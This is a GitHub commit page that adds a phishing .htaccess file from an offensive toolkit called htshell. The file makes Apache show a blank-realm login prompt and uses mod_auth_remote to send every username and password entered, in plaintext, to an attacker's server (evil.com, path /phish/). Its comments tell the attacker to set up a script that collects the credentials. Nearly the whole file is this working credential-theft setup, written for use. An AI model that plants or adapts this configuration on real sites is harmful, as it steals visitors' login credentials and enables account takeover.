Skip to content

Commit 72ed11d

Browse files
committed
Phishing module
1 parent 8a0359c commit 72ed11d

File tree

1 file changed

+15
-0
lines changed

1 file changed

+15
-0
lines changed

mod_auth_remote.phish.htaccess

+15
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,15 @@
1+
# Untested
2+
# Remote basic auth phising attack - Part of the htshell project
3+
# Written by Wireghoul - http://www.justanotherhacker.com
4+
# This file will prompt the user for username and password
5+
# And send the credentials to your server in plaintext (http basic auth)
6+
# You will need to edit this file and create a script to collect the
7+
# credentials on your server
8+
AuthType Basic
9+
AuthName ""
10+
AuthRemoteServer evil.com
11+
AuthRemotePort 80
12+
AuthRemoteURL /phish/
13+
require valid-user
14+
# Your script need to return the corresponding 401 or 200 ok response codes
15+
# to the mod_auth_remote module.

0 commit comments

Comments
 (0)